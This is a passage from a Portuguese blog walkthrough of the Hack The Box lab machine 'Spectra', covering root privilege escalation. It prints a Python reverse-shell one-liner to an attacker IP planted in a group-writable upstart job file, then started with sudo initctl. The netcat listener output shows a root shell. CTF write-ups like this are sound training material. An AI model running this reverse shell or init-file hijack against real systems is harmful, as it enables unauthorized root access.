<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>katie@spectra ~ <span class="nv">$ </span>find / <span class="nt">-group</span> developers 2&gt;/dev/null
/etc/init/test6.conf
/etc/init/test7.conf
/etc/init/test3.conf
/etc/init/test4.conf
/etc/init/test.conf
/etc/init/test8.conf
/etc/init/test9.conf
/etc/init/test10.conf
/etc/init/test2.conf
/etc/init/test5.conf
/etc/init/test1.conf
/srv
/srv/nodetest.js
katie@spectra ~ <span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-la</span> /etc/init/test<span class="k">*</span>
<span class="nt">-rw-rw----</span> 1 root developers 478 Jun 29  2020 /etc/init/test.conf
<span class="nt">-rw-rw----</span> 1 root developers 478 Jun 29  2020 /etc/init/test1.conf
<span class="nt">-rw-rw----</span> 1 root developers 478 Jun 29  2020 /etc/init/test10.conf
<span class="nt">-rw-rw----</span> 1 root developers 478 Jun 29  2020 /etc/init/test2.conf
<span class="nt">-rw-rw----</span> 1 root developers 478 Jun 29  2020 /etc/init/test3.conf
<span class="nt">-rw-rw----</span> 1 root developers 478 Jun 29  2020 /etc/init/test4.conf
<span class="nt">-rw-rw----</span> 1 root developers 478 Jun 29  2020 /etc/init/test5.conf
<span class="nt">-rw-rw----</span> 1 root developers 478 Jun 29  2020 /etc/init/test6.conf
<span class="nt">-rw-rw----</span> 1 root developers 478 Jun 29  2020 /etc/init/test7.conf
<span class="nt">-rw-rw----</span> 1 root developers 478 Jun 29  2020 /etc/init/test8.conf
<span class="nt">-rw-rw----</span> 1 root developers 478 Jun 29  2020 /etc/init/test9.conf
</code></pre></div></div>

<p>Para obter acesso de root, bastou alterar o job executado por um destes arquivos para iniciar um shell reverso para a máquina atacante com acesso privilegiado e assim, obter a flag de root.</p>

<p>Neste caso escolhi o arquivo <code class="language-plaintext highlighter-rouge">/etc/init/test10.conf</code>, que possuía o conteúdo abaixo e alterei apenas a sua seção script, conforme segundo bloco abaixo.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>katie@spectra ~ <span class="nv">$ </span><span class="nb">cat</span> /etc/init/test10.conf
description <span class="s2">"Test node.js server"</span>
author      <span class="s2">"katie"</span>

start on filesystem or runlevel <span class="o">[</span>2345]
stop on shutdown

script

    <span class="nb">export </span><span class="nv">HOME</span><span class="o">=</span><span class="s2">"/srv"</span>
    <span class="nb">echo</span> <span class="nv">$$</span> <span class="o">&gt;</span> /var/run/nodetest.pid
    <span class="nb">exec</span> /usr/local/share/nodebrew/node/v8.9.4/bin/node /srv/nodetest.js

end script
</code></pre></div></div>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Edited portion</span>
script
  python <span class="nt">-c</span> <span class="s1">'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</span>
end script
</code></pre></div></div>

<p>Após edição do arquivo, iniciado listener e executado o comando abaixo com a conta de katie, obtendo o shell reverso e flag</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># At Spectra as Kali</span>
katie@spectra /etc/init <span class="nv">$ </span><span class="nb">sudo</span> /sbin/initctl stop test10
initctl: Unknown instance:
katie@spectra /etc/init <span class="nv">$ </span><span class="nb">sudo</span> /sbin/initctl start test10
test10 start/running, process 4947
</code></pre></div></div>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># At attacker machine</span>
<span class="nv">$ </span>nc <span class="nt">-lnvp</span> 4443
listening on <span class="o">[</span>any] 4443 ...
connect to <span class="o">[</span>10.10.10.10] from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.229] 33606
<span class="c"># id</span>
<span class="nv">uid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span>
<span class="c"># whoami</span>
root
<span class="c"># cat /root/root.txt</span>
&lt;redacted&gt;
</code></pre></div></div>

<p>Espero que tenham gostado!</p>

<p>Vejo vocês no próximo post <img class="emoji" title=":smiley:" alt=":smiley:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f603.png" height="20" width="20"></p>

        
      </section>

      <footer class="page__meta">
        
        
  


  

  <p class="page__taxonomy">
    <strong><i class="fas fa-fw fa-tags" aria-hidden="true"></i> Tags: </strong>
    <span itemprop="keywords">
    
      <a href="/tags/#hackthebox" class="page__taxonomy-item p-category" rel="tag">HackTheBox</a><span class="sep">, </span>
    
      <a href="/tags/#htb-easy" class="page__taxonomy-item p-category" rel="tag">HTB Easy</a><span class="sep">, </span>
    
      <a href="/tags/#htb-linux" class="page__taxonomy-item p-category" rel="tag">HTB Linux</a>
    
    </span>
  </p>




  


  

  <p class="page__taxonomy">
    <strong><i class="fas fa-fw fa-folder-open" aria-hidden="true"></i> Categorias: </strong>
    <span itemprop="keywords">
    
      <a href="/categorias/#walkthrough" class="page__taxonomy-item p-category" rel="tag">Walkthrough</a>
    
    </span>
  </p>


        

  <p class="page__date"><strong><i class="fas fa-fw fa-calendar-alt" aria-hidden="true"></i> Atualizado em:</strong> <time class="dt-published" datetime="2021-06-26T13:00:00-03:00">June 26, 2021</time></p>

      </footer>

      <section class="page__share" id="sharelinks">
  
    <h4 class="page__share-title">Compartilhe</h4>
  

  <!-- CUSTOM: Localized sharing links -->
  

  <a href="https://twitter.com/intent/tweet?via=zerahzurc&amp;text=Walktrough%3A+HTB+Spectra%20https%3A%2F%2Fdavicruz.com%2Fwalkthrough%2F2021%2F06%2Fhtb-spectra" class="btn btn--twitter" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Compartilhe Twitter"><i class="fab fa-fw fa-twitter" aria-hidden="true"></i><span> Twitter</span></a>

  <a href="https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Fdavicruz.com%2Fwalkthrough%2F2021%2F06%2Fhtb-spectra" class="btn btn--facebook" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Compartilhe Facebook"><i class="fab fa-fw fa-facebook" aria-hidden="true"></i><span> Facebook</span></a>

  <a href="https://www.linkedin.com/shareArticle?mini=true&amp;url=https%3A%2F%2Fdavicruz.com%2Fwalkthrough%2F2021%2F06%2Fhtb-spectra" class="btn btn--linkedin" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Compartilhe LinkedIn"><i class="fab fa-fw fa-linkedin" aria-hidden="true"></i><span> LinkedIn</span></a>

  <a href="whatsapp://send?text=https%3A%2F%2Fdavicruz.com%2Fwalkthrough%2F2021%2F06%2Fhtb-spectra" data-action="share/whatsapp/share" class="btn btn--whatsapp" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Compartilhe Whatsapp"><i class="fab fa-fw fa-whatsapp" aria-hidden="true"></i><span> Whatsapp</span></a>

  <a href="https://telegram.me/share/url?url=https%3A%2F%2Fdavicruz.com%2Fwalkthrough%2F2021%2F06%2Fhtb-spectra&amp;text=Walktrough%3A+HTB+Spectra" class="btn btn--telegram" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Compartilhe Telegram"><i class="fab fa-fw fa-telegram-plane" aria-hidden="true"></i><span> Telegram</span></a>

  <!-- END CUSTOM: Localized sharing links -->
</section>


      
  <nav class="pagination">
    
    
      <a href="/walkthrough/2021/06/htb-tenet" class="pagination--pager" title="Walktrough: HTB Tenet
">Anterior</a>
    
    
    
      
        <a href="/walkthrough/2021/07/htb-ophiuchi" class="pagination--pager" title="Walktrough: HTB Ophiuchi
">Próxima</a>
      
    
  </nav>

    </div>

    
      <div class="page__comments">
  
  
      <h4 class="page__comments-title">Deixe um comentário</h4>
      <section id="utterances-comments"></section>
    
</div>

    
  </article>

  
  
    <div class="page__related">
      <h2 class="page__related-title">Talvez você também goste</h2>
      <div class="grid__wrapper">
        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
      <div class="archive__item-teaser">
        <img src="https://i.imgur.com/TJKS5F6.png" alt="">
      </div>
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      <!-- CUSTOM: Use localized link to posts in archive page -->
      
      
        <a href="/walkthrough/2021/10/htb-explore" rel="permalink">Walktrough: HTB Explore
</a>
      
      
      <!-- END CUSTOM: Use localized link to posts in archive page-->
    </h2>
    

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-fw fa-calendar-alt" aria-hidden="true"></i>
        
        <time datetime="2021-10-30T13:00:00-03:00">October 30, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-fw fa-clock" aria-hidden="true"></i>
        
          4 minuto(s) de leitura
        
      </span>
    

    <!-- CUSTOM: Post Meta attributes and links -->
    <span class="page__meta-sep page__meta-lang"></span>
    
    
    
    
    
    <span class="page__meta-lang"><a href="/en-US/walkthrough/2021/06/htb-spectra">Read also in  <img class="emoji" title=":us:" alt=":us:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1fa-1f1f8.png" height="20" width="20"></a></span>
    

    

    

    
    
    
  <span class="page__meta-sep page__meta-share"></span>
  <span class="page__meta-share">
    <i class="fas fa-share-alt" aria-hidden="true"></i>
    <a href="#sharelinks">Compartilhar</a>
  </span>
    <!-- END CUSTOM: Post Meta attributes and links -->
  </p>


    <p class="archive__item-excerpt" itemprop="description">Olá pessoal!

A máquina desta semana será Explore, uma máquina Android classificada como fácil do Hack The Box, criada por bertolis.
</p>
  </article>
</div>

        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
      <div class="archive__item-teaser">
        <img src="https://i.imgur.com/89b1SdH.png" alt="">
      </div>
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      <!-- CUSTOM: Use localized link to posts in archive page -->
      
      
        <a href="/walkthrough/2021/10/htb-dynstr" rel="permalink">Walktrough: HTB Dynstr
</a>
      
      
      <!-- END CUSTOM: Use localized link to posts in archive page-->
    </h2>
    

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-fw fa-calendar-alt" aria-hidden="true"></i>
        
        <time datetime="2021-10-16T13:00:00-03:00">October 16, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-fw fa-clock" aria-hidden="true"></i>
        
          10 minuto(s) de leitura
        
      </span>
    

    <!-- CUSTOM: Post Meta attributes and links -->
    <span class="page__meta-sep page__meta-lang"></span>
    
    
    
    
    
    <span class="page__meta-lang"><a href="/en-US/walkthrough/2021/06/htb-spectra">Read also in  <img class="emoji" title=":us:" alt=":us:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1fa-1f1f8.png" height="20" width="20"></a></span>
    

    

    

    
    
    
  <span class="page__meta-sep page__meta-share"></span>
  <span class="page__meta-share">
    <i class="fas fa-share-alt" aria-hidden="true"></i>
    <a href="#sharelinks">Compartilhar</a>
  </span>
    <!-- END CUSTOM: Post Meta attributes and links -->
  </p>


    <p class="archive__item-excerpt" itemprop="description">Olá pessoal!

A máquina desta semana será Dynstr, outra máquina Linux classificada como mediana do Hack The Box, criada por jkr.
</p>
  </article>
</div>

        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
      <div class="archive__item-teaser">
        <img src="https://i.imgur.com/JkBtXmO.png" alt="">
      </div>
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      <!-- CUSTOM: Use localized link to posts in archive page -->
      
      
        <a href="/walkthrough/2021/10/htb-cap" rel="permalink">Walktrough: HTB Cap
</a>
      
      
      <!-- END CUSTOM: Use localized link to posts in archive page-->
    </h2>
    

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-fw fa-calendar-alt" aria-hidden="true"></i>
        
        <time datetime="2021-10-02T13:00:00-03:00">October 2, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-fw fa-clock" aria-hidden="true"></i>
        
          6 minuto(s) de leitura
        
      </span>
    

    <!-- CUSTOM: Post Meta attributes and links -->
    <span class="page__meta-sep page__meta-lang"></span>
    
    
    
    
    
    <span class="page__meta-lang"><a href="/en-US/walkthrough/2021/06/htb-spectra">Read also in  <img class="emoji" title=":us:" alt=":us:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1fa-1f1f8.png" height="20" width="20"></a></span>
    

    

    

    
    
    
  <span class="page__meta-sep page__meta-share"></span>
  <span class="page__meta-share">
    <i class="fas fa-share-alt" aria-hidden="true"></i>
    <a href="#sharelinks">Compartilhar</a>
  </span>
    <!-- END CUSTOM: Post Meta attributes and links -->
  </p>


    <p class="archive__item-excerpt" itemprop="description">Olá pessoal!

A máquina desta semana será Cap, outra máquina Linux classificada como fácil do Hack The Box, criada por  InfoSecJack.
</p>
  </article>
</div>

        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
      <div class="archive__item-teaser">
        <img src="https://i.imgur.com/pUqq7fY.png" alt="">
      </div>
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      <!-- CUSTOM: Use localized link to posts in archive page -->
      
      
        <a href="/walkthrough/2021/09/htb-pit" rel="permalink">Walktrough: HTB Pit
</a>
      
      
      <!-- END CUSTOM: Use localized link to posts in archive page-->
    </h2>
    

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-fw fa-calendar-alt" aria-hidden="true"></i>
        
        <time datetime="2021-09-25T09:00:00-03:00">September 25, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-fw fa-clock" aria-hidden="true"></i>
        
          11 minuto(s) de leitura
        
      </span>
    

    <!-- CUSTOM: Post Meta attributes and links -->
    <span class="page__meta-sep page__meta-lang"></span>
    
    
    
    
    
    <span class="page__meta-lang"><a href="/en-US/walkthrough/2021/06/htb-spectra">Read also in  <img class="emoji" title=":us:" alt=":us:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1fa-1f1f8.png" height="20" width="20"></a></span>
    

    

    

    
    
    
  <span class="page__meta-sep page__meta-share"></span>
  <span class="page__meta-share">
    <i class="fas fa-share-alt" aria-hidden="true"></i>
    <a href="#sharelinks">Compartilhar</a>
  </span>
    <!-- END CUSTOM: Post Meta attributes and links -->
  </p>


    <p class="archive__item-excerpt" itemprop="description">Olá pessoal!

A máquina desta semana será Pit, outra máquina Linux classificada como mediana Hack The Box, criada por polarbearer e GibParadox.
</p>
  </article>
</div>

        
      </div>
    </div>
  
  
</div>

    </div>

    
      <div class="search-content">
        <div class="search-content__inner-wrap">
<form class="search-content__form" onkeydown="return event.key != 'Enter';" role="search">
    <label class="sr-only" for="search">
      Digite seu termo de busca...
    </label>
    <input type="search" id="search" class="search-input" tabindex="-1" placeholder="Digite seu termo de busca...">
  </form>
  <div id="results" class="results"></div>
</div>

      </div>
    

    <div id="footer" class="page__footer">
      <footer>
        <!-- start custom footer snippets -->

<!-- Mermaid.js -->
<script type="module">
    import mermaid from 'https://unpkg.com/mermaid@9/dist/mermaid.esm.min.mjs';
    const config = {
        "theme": "dark", 
        "startOnLoad": true
    };
    mermaid.initialize(config);
</script>

<!-- end custom footer snippets -->
        <div class="page__footer-follow">
  <ul class="social-icons">
    
      <li><strong>Siga:</strong></li>
    

    
      
        
          <li><a href="https://www.linkedin.com/in/davicruz" rel="nofollow noopener noreferrer"><i class="fab fa-fw fa-linkedin" aria-hidden="true"></i> Linkedin</a></li>
        
      
        
          <li><a href="https://twitter.com/zerahzurc" rel="nofollow noopener noreferrer"><i class="fab fa-fw fa-twitter-square" aria-hidden="true"></i> Twitter</a></li>
        
      
        
          <li><a href="https://github.com/davi-cruz" rel="nofollow noopener noreferrer"><i class="fab fa-fw fa-github" aria-hidden="true"></i> GitHub</a></li>
        
      
    
    <!-- start custom: Fix Atom Feed, add Privacy, Consent and Read in other languages -->
    
      <li><a href="/feed.xml"><i class="fas fa-fw fa-rss-square" aria-hidden="true"></i> Feed</a></li>
    
    <li><a href="https://davicruz.com/termos-e-privacidade" rel="nofollow noopener noreferrer"><i class="fas fa-user-shield" aria-hidden="true"></i> Termos de uso e Política Privacidade</a></li>
    <!--<li><a onclick="return klaro.show();"><i class="fas fa-shield-alt" aria-hidden="true"></i> Revisar consentimento</a></li>-->
    
      
    
      
        
          <li><a href="/en-US">Also available in  <img class="emoji" title=":us:" alt=":us:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1fa-1f1f8.png" height="20" width="20"></a></li>
        
        
        
      
    
    <!-- end custom: Fix Atom Feed, add Privacy, Consent and Read in other languages -->
  </ul>
</div>

<div class="page__footer-copyright">© 2023 Davi Cruz. Desenvolvido com <a href="https://jekyllrb.com" rel="nofollow">Jekyll</a> &amp; <a href="https://mademistakes.com/work/minimal-mistakes-jekyll-theme/" rel="nofollow">Minimal Mistakes</a> &amp; <a href="https://github.com/kurtsson/jekyll-multiple-languages-plugin" rel="nofollow">Multiple Languages Plugin</a>.</div>

      </footer>
    </div>

    
  <script src="/assets/js/main.min.js"></script>




<script src="/assets/js/lunr/lunr.min.js"></script>
<script src="/assets/js/lunr/lunr-store.js"></script>
<script src="/assets/js/lunr/lunr-en.js"></script>




  <!-- start custom analytics snippet -->

<!-- end custom analytics snippet -->





    <script>
  'use strict';

  (function() {
    var commentContainer = document.querySelector('#utterances-comments');

    if (!commentContainer) {
      return;
    }

    var script = document.createElement('script');
    script.setAttribute('src', 'https://utteranc.es/client.js');
    script.setAttribute('repo', 'davi-cruz/davi-cruz-blog');
    // CUSTOM : Utterances post mapping due to Jekyll Multilanguage
    script.setAttribute('issue-term', 'htb-spectra');
    
    script.setAttribute('theme', 'github-dark');
    script.setAttribute('crossorigin', 'anonymous');

    commentContainer.appendChild(script);
  })();
</script>

  





  </body>
</html>
